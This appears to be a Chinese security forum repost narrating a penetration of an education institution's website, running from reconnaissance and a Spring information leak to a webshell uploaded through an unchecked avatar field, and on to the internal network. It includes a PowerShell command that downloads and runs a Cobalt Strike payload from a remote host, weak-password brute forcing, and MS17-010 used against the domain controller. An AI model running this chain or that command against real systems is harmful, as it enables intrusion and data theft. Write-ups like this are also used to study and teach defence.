找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2116|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" u3 Q, `, B' U2 ~7 `3 H& h2 H) W/ V 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 2 N' j$ a& @ Q4 C/ O9 c

9 z- \* O, M5 }/ I! _- h# l

5 }3 ^2 u4 l v* c4 e0 \: ~ t  7 S% J1 J. T* N6 Q% A

) T' B- I O7 ^9 D. V: m

' z6 x8 f# N& N+ S0 A9 U" i2 D' H 正文 : `6 e4 j" F" c6 D

: J/ F8 `& A/ A% i

; \" r- Q' A' Q u' w; W+ j   : R: N8 d. k: } J' g N7 _

8 m7 w0 |" t) Z8 ?5 c- f. N, Q

! k x. S& N' }. `$ k! f 目标:www.xxxx.com(一家教育机构)
4 s- g8 e+ Z0 ]4 H: w" W7 Q: I: r$ y$ L
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
% ]; o* }5 n H8 [) O. k7 s: ?' r- P

( V4 C+ {: v$ j# _6 z

6 _ b- q& L) ~% c! V vshapes=4 |, x) Q/ F3 Y5 c6 F

6 G3 O. ]5 R! z% v; P' u9 p: T

' W3 l6 s6 p- l2 e. A7 w 进行了简单的信息搜集
" X, p# e3 F( f
( J+ S( q; o* u+ I }6 ?# M
7 z5 R) Y/ {8 O3 s' q( x/ F6 w

r3 h0 m8 I4 u4 m: ]

8 \9 l. k+ S6 a& t- v( n 子域名搜集 , S y! K1 N3 L$ a8 \* }$ R3 r; }

$ q* t+ m1 u$ Y# l. g

$ Z& k+ s# j4 Q, e vshapes=$ d9 _0 r) n1 L9 r. X) N( o/ u8 ?4 K

( n' t' J0 s: R2 C, L

$ E) v6 v6 N2 M8 ~ fofa找资产
" T9 q# s2 k6 \2 e, J
' p) Y; t& C, [1 Y, ~" W
* ]1 S2 k! L9 d0 `- X

1 _, e6 p0 F/ _) }* `

: ?( N# v6 ~, ]1 Q vshapes= 0 Z/ v1 S- D1 N* t8 |

0 q0 U& w; j* ?3 m' ^7 W( N" n

9 k5 f3 A, t9 r C2 \0 _# o* p 一共七个资产。去重之后只有两个。
9 B) h% s3 W& L4 C( V
( ^' E, U9 d& a. A5 h0 c1 C7 s- n
) A7 h+ `0 l4 l! b; i7 ?

0 Y0 z' x& y% u5 F0 H! Y

3 |8 F' `, M' u3 v 目录探测- U& g# I# d! E" ?- l5 @1 o6 I

; \5 \' x0 w% m& v6 {2 d( e7 `/ O

2 b$ R: t9 i3 Z! z3 @8 V vshapes=8 C7 Y1 ]9 p$ o. o

1 t1 E4 v5 [5 d9 A- b) r

. s' r! _- c8 T- e 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
3 E' Y! h& [. F% t
! R9 |2 F" I2 D6 Q
4 R' S' A3 W2 D

$ \! A6 [ y* C% V9 N. Y& x

4 [1 `) q+ f$ ] 我又尝试了通过修改返回包来绕过登录界面 $ i/ [/ K! ]0 I

0 z& V9 |3 @4 Z9 i

K* \. g, {0 u# q$ Z L/ G vshapes= 8 \0 U# p. ^) F& k

4 I& z- Z+ `; A& c# U2 E* P( k- j

+ h$ |( G9 y) Y- {" L 还是不行,尝试注入无果7 f2 e# x7 ^9 l6 k

/ l$ }# J# f' f% e0 H

9 z: W1 E' e+ k9 y vshapes= # J3 r+ D$ \( P; J# p+ T5 q

x) U J$ p5 ~! y Z/ \

2 ~2 p% c5 b7 w 不过我目录探测出了一处Spring信息泄露
. e- q+ V+ v- O7 F7 v" I5 V
7 ^& j) A" B, m8 }# g' y, ]
. L8 ~& {% ^) \, E0 h5 c; H' X

+ I! q6 s I: C( {5 C& o6 g

/ c9 C- T/ q$ d }7 N vshapes= # R& M- U: r% r, k3 U8 m7 t2 F G

, a. }( z- S8 ]9 p3 q. j2 O

' ?$ m- z% `$ j2 F9 |- C- X8 z 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 U: {9 L9 t- o: [

/ l* n2 u3 X& m/ r

) D' d9 G8 K0 X6 E vshapes= 8 z& N: z: m( K/ r2 L

! p# P2 R7 E/ k$ r

# V t4 ?# m7 {( h0 v 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。" Z9 U) I8 v$ ?

1 E4 T: P/ M6 _# s9 ?1 e" ^ Y0 \

0 g4 j" ^4 e- Z1 P7 w9 ~' j' F vshapes=9 v$ j. i i' o o* e3 g" T H7 w+ [

, M# A( S* d7 p' W& b8 _2 _- A

/ H: o/ Z/ T! }$ a 获取有些师傅到这一步就手机抓包电脑测了。 3 n0 |0 \ {3 }( x; d# |

$ x, w3 s H1 D! V: k+ s) i: v0 Q

/ i- Y4 B; Q" w$ r( x7 C4 H* J Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 9 W8 d- N ~& e$ e. a) f" ~6 J, r

+ @0 j$ Z) e$ l% [$ ]

9 o3 J3 y. U' F @% I 其中在一个公众号发现了小程序,可以进行注册。+ B* V U& v( |' O/ q

: f0 g1 ]& j/ ?) v

8 c: @( w# H$ h% G$ \+ ~) q" ` 看到了头像上传,尝试上传获取WebShell / C1 x* \/ j1 |8 i

# `# g! N- h' T- Z9 w1 B7 A

, h* b1 V% s0 f0 e1 G# V vshapes=: ?8 T' V+ w2 E2 Y' s3 n

8 ^4 D" D2 z# L, n

* S. s; r; _* f- {) l6 ?1 D 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问3 J: q$ v2 [- R

2 }- e) k: q( Y

" J( n. K* ]/ h. P5 _ vshapes= H( |9 H6 s, H

0 H- S* Z# S8 U, ]$ D

u$ g$ `6 O: p5 i, o 然后上了大马3 w. g- M6 k; e X

$ f9 O; i3 V% D8 G

# C" z5 e+ I% \4 Y9 F! K vshapes=% l7 B' Y) G0 e+ Z8 p; r

' x9 z. H% k- I$ ]0 V- A$ n

u6 M7 B" M2 f' W% m" Q% g vshapes=8 B# J$ ]" }$ A* X9 o- [

, c* \! G- `" a1 ]3 L8 S

; L S* J+ N$ k 通过翻找文件发现数据库账号密码 - i6 ]- \& [$ D; t5 v$ F- S" ~# t& X

1 g/ ]7 m5 C$ B/ z5 E/ G

: v! W u! x6 r1 Q, h9 G vshapes=4 f/ T2 ~: f: k0 r: l* Y

. m0 B+ \. x! A$ c2 b! g

; S4 ^& J) a) ]% Z1 k --内网渗透7 U3 k: i' k* T& J7 [

3 ]$ M, g0 `3 }1 x* z* K+ Z: {' k

v- B. U/ j; |: ^ 直接通过powershell执行 cs上线) b; o" F2 k9 P: j6 E

- c( N1 X3 s) l/ r

+ I& \4 {. p9 F& |- o powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" ?9 J5 w. g+ C3 i( Y

# _) A. J% t Q% s, P

* G$ E2 Q) y O7 ^ vshapes=; |1 k( a5 |0 a& N8 R) ~& t/ r

4 _3 X( ?& x7 ^6 `9 ^4 t

7 k8 ~( M7 j' {' L! Z+ D$ H1 } 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破, a! D: P" B4 s9 q$ s6 J

/ r! o* J# ~& n9 P. }& v" G

; a5 I6 m2 d% i- z% S8 ^2 | vshapes= o v+ i5 m5 C$ Y8 E

# g4 N" K% W* ~+ j

( Z2 \* W6 `6 b6 G+ p 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
: Q6 ~( c, w! r3 g
) ^) F$ h& d9 J [& N: B
; p7 X) Q! F S: E2 r2 x
2 A4 X* {* b; K4 A8 Q0 N

4 I! L" x9 }- m' Q& U2 _3 y2 a* `

9 M/ r& D6 t# @) n vshapes= 0 m( p5 A _! q; V! M: }

$ I& ?/ z0 Y, F: K! k. ^1 ^

R& o4 f+ H! c 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
# \5 g6 F* O3 p
6 }9 J# h, c: R, K0 X# \ n
' U( A+ Z9 m, X

0 U& q m/ h% e: }* n p

# M# t5 t; O: p' w vshapes= 1 O+ H4 }, A% M5 p( W& u

: O9 M2 ]$ }' G

9 K7 R& c) I) i
[4 S0 s' l1 `: I2 ~/ l
p* M6 a) j, q% e
! q% [) M, L% s/ o) r

) [( ?6 _4 f. n" `, T! ?% N; T3 v# x

2 g1 j3 V! C, E/ v+ ?% O7 V, m- I2 _  2 J; M+ m, x* S7 S' ?$ P

7 i( I, n) i6 Q: O# S4 _, e

7 G/ q, m/ k& u/ W7 R 小结 2 }% y: j' c- U

5 g! ~6 d" S* n2 ?

! e4 ?4 |) r) L1 i0 z$ [, A2 P  4 @% _0 T' l; Y! D" d. [" Z

) @4 I& ~) W7 A- M4 Z

6 Z$ f9 Q( w" Z9 A4 c5 f 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! , R' @5 h; Q0 a) \

8 }4 Y; k; s; C8 u

! W* y" H$ U% w+ ~- p1 e( m( ]/ }9 E   - {! n' S7 f/ K$ a& y

+ h' _7 T( W9 o6 ~6 D
    8 L& b5 E3 h$ k" C
  • * ^$ [3 f+ T8 c+ V4 G  8 V4 I2 m0 j w( T" g- p, `
  • ' G3 P: s( F) O! P/ Q, O9 u( G
  • 8 r' H, R" K2 Z5 x* Y# C  + ?8 H" S ^2 B9 E8 s1 i
  • ( c, S, a; \ F/ c
$ G( r- {8 r6 a9 l( Y

3 S Q. ^3 g/ S3 @ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html T* w* ~) ~) S# T& C B. w# f8 B

/ h( p/ |& q+ ~) X5 Z

5 U- d3 y3 Z7 y7 h& g9 n  - b) \' j. _+ O! o3 w5 C& O1 L

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表